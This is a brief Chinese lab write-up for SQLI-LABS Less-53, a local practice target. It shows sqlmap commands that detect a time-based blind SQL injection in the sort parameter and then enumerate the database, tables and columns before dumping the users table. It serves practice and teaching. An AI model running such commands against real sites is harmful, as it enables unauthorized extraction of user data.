SQLI-LAPS 实验记录
Less-53
这一关与上一关类似,也是没有回显信息,采用sqlmap工具进行注入,发现只有时间盲注可以使用,因此,继续使用sqlmap工具来解决问题。
首先我们在命令行中输入sqlmap命令:
sql
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch
结果如图所示,只有一种注入方式:时间盲注。
接下来,我们继续使用sqlmap工具来进行注入,爆出数据库名、表名、列名等,语句如下:
- 查询库名:
sql
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch --dbs- 查询表名:
sql
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security --tables- 查询列名:
sql
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --columns- 查询数据:
sql
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --dump